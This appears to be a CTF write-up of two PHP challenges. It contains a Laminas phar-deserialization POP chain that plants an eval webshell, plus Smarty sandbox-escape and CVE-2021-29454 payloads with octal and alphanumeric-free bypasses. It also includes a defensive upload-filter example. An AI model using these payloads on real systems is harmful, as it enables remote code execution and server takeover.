Fan website
The source code is leaked: www.zip.
Auditing the code reveals an album route with the controller module/Album/src/Controller/AlbumController.php; the controller implements upload, delete and other operations.
In the upload part you can see the following filter:
```php
preg_match("/<\?|php|HALT\_COMPILER/i", $cont)
```
From this we guess phar deserialization, so we still need a trigger point: the file delete operation calls the unlink function.
Next we need a gadget chain; since the challenge hints at the laminas component, search for related vulnerabilities:
https://xz.aliyun.com/t/8975#toc-0
The article has a ready-made chain, but we still need to bypass the challenge's filter. The overall approach is:
- phar deserialization
- gzip to bypass the character filter
- upload the compressed phar file through the upload function
- change the extension to jpg to bypass the whitelist
- junk characters to bypass the size limit
- trigger execution at the delete point via the phar protocol
The POC is as follows:
```php
<?php
// Building a phar requires phar.readonly=0 (php.ini or php -d phar.readonly=0).
namespace Laminas\View\Resolver{
    class TemplateMapResolver{
        protected $map = ["setBody"=>"system"];
    }
}
namespace Laminas\View\Renderer{
    class PhpRenderer{
        private $__helpers;
        function __construct(){
            $this->__helpers = new \Laminas\View\Resolver\TemplateMapResolver();
        }
    }
}
namespace Laminas\Log\Writer{
    abstract class AbstractWriter{}
    class Mail extends AbstractWriter{
        protected $eventsToMail = ["echo '<?php eval(\$_POST[1]);?>' > /var/www/public/a.php"];
        protected $subjectPrependText = null;
        protected $mail;
        function __construct(){
            $this->mail = new \Laminas\View\Renderer\PhpRenderer();
        }
    }
}
namespace Laminas\Log{
    class Logger{
        protected $writers;
        function __construct(){
            $this->writers = [new \Laminas\Log\Writer\Mail()];
        }
    }
}
namespace{
    $a = new \Laminas\Log\Logger();
    $phar = new Phar("phar.phar");
    $phar->startBuffering();
    $phar->setStub("<?php __HALT_COMPILER(); ?>");
    $phar->setMetadata($a); // store the custom meta-data in the manifest
    $phar->addFromString("test.txt", str_repeat('aaa',1000000)); // add the file to be compressed
    $phar->stopBuffering();
}
?>
```
Visit /album/imgupload to upload the image, then use album/imgdelete to delete the image with the path:
```
phar:///var/www/public/img/7218dc37139fd1776abe383cf3e0266f.png
```
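The upload filter above only inspects the raw bytes, which is exactly why a gzip-compressed phar slips past it. As an added example (not code from the challenge or from this writeup), the Python below places the original regex check beside a hardened version that unwraps gzip/bzip2 layers before matching, since the phar:// wrapper reads both compressed forms transparently. The sample inputs are constructed stand-ins, not real phar archives.

```python
import bz2
import gzip
import re
import zlib

# The challenge's upload regex (from the page), compiled with the same /i flag.
UPLOAD_FILTER = re.compile(rb"<\?|php|HALT_COMPILER", re.IGNORECASE)

# Whole-archive compression formats that the phar:// stream wrapper unwraps on its own.
GZIP_MAGIC = b"\x1f\x8b"
BZIP2_MAGIC = b"BZh"


def decompress_layers(data: bytes, max_layers: int = 3) -> bytes:
    """Peel off gzip/bzip2 wrappers (a few layers deep) so the filter sees the real bytes."""
    for _ in range(max_layers):
        if data.startswith(GZIP_MAGIC):
            data = gzip.decompress(data)
        elif data.startswith(BZIP2_MAGIC):
            data = bz2.decompress(data)
        else:
            break
    return data


def naive_filter_rejects(data: bytes) -> bool:
    """The original check: regex over the raw upload only."""
    return UPLOAD_FILTER.search(data) is not None


def hardened_filter_rejects(data: bytes) -> bool:
    """Decompress first; compressed data that cannot be decoded is rejected outright."""
    try:
        inner = decompress_layers(data)
    except (OSError, EOFError, zlib.error):
        return True
    return UPLOAD_FILTER.search(inner) is not None


# Constructed samples (not real archives): a phar-style stub, its compressed
# wrappings, and a PNG header like a legitimate upload would start with.
PLAIN_PHAR = b"<?php __HALT_COMPILER(); ?>\r\n" + b"\x00" * 16
GZ_PHAR = gzip.compress(PLAIN_PHAR)
BZ_PHAR = bz2.compress(PLAIN_PHAR)
BENIGN_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16

if __name__ == "__main__":
    for name, blob in [("plain", PLAIN_PHAR), ("gzip", GZ_PHAR), ("bzip2", BZ_PHAR), ("png", BENIGN_PNG)]:
        print(f"{name:6} naive={naive_filter_rejects(blob)} hardened={hardened_filter_rejects(blob)}")
```

Because a phar stub may also be prefixed with image bytes, an extension or magic-byte check alone is not a substitute for inspecting the decompressed content.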
Smarty Calculator
Again the source code is leaked; download www.zip.
```php
<?php
error_reporting(0);
include_once('./Smarty/Smarty.class.php');
$smarty = new Smarty();
$my_security_policy = new Smarty_Security($smarty);
$my_security_policy->php_functions = null;
$my_security_policy->php_handling = Smarty::PHP_REMOVE;
$my_security_policy->php_modifiers = null;
$my_security_policy->static_classes = null;
$my_security_policy->allow_super_globals = false;
$my_security_policy->allow_constants = false;
$my_security_policy->allow_php_tag = false;
$my_security_policy->streams = null;
$my_security_policy->php_modifiers = null;
$smarty->enableSecurity($my_security_policy);
function waf($data){
    $pattern = "php|\<|flag|\?";
    $vpattern = explode("|", $pattern);
    foreach ($vpattern as $value) {
        if (preg_match("/$value/", $data)) {
            echo("<div style='width:100%;text-align:center'><h5>Calculator don not like U<h5><br>");
            die();
        }
    }
    return $data;
}
if(isset($_POST['data'])){
    if(isset($_COOKIE['login'])) {
        $data = waf($_POST['data']);
        echo "<div style='width:100%;text-align:center'><h5>Only smarty people can use calculators:<h5><br>";
        $smarty->display("string:" . $data);
    }else{
        echo "<script>alert(\"你还没有登录\")</script>";
    }
}
```
A login check on a cookie is set here; adding login=1 is enough. After that, the submitted data passes through waf() and is handed to $smarty->display.
We can find the Smarty version.
Search for related vulnerabilities:
https://srcincite.io/blog/2021/02/18/smarty-template-engine-multiple-sandbox-escape-vulnerabilities.html
Smarty_Internal_Runtime_TplFunction Sandbox Escape PHP code injection
POC:
```
data={function+name='rce(){};system("id");function%0A%0A'}{/function}
```
The newline here is used to bypass the regex in sysplugins\smarty_internal_compile_function.php.
CVE-2021-29454
The exploitation point is in src/Smarty/plugins/function.math.php, which calls eval to achieve command execution.
Here the regex filter needs to be bypassed, using either octal escapes or an alphanumeric-free webshell.
- Octal bypass
Write a file:
```php
("file_put_contents")("1.php","<?php eval($_POST[1]);?>")
```
Converted to octal:
```
data={math equation="(\"\\146\\151\\154\\145\\137\\160\\165\\164\\137\\143\\157\\156\\164\\145\\156\\164\\163\")(\"\\61\\56\\160\\150\\160\",\"\\74\\77\\160\\150\\160\\40\\145\\166\\141\\154(\\44\\137\\120\\117\\123\\124\\133\\61\\135)\\73\\77\\76\")"}
```
Then connect with AntSword.
- Alphanumeric-free webshell
```python
import requests
import urllib.parse

url = "http://c5e30757-f8da-4886-b42f-b35734e624da.node4.buuoj.cn:81"
data = {'data': urllib.parse.unquote(''' {math equation="1;('%30%2f%30%25%2e'|'%40%40%40%40%40')(('%23%30%00%00%26%00%00%21'|'%40%40%20%2f%40%2a%20%40'),('%32'|'%40'));//" }''')}
r = requests.post(url, data=data, cookies={'login': '1'})
print(r.text)
```
Then visit /a.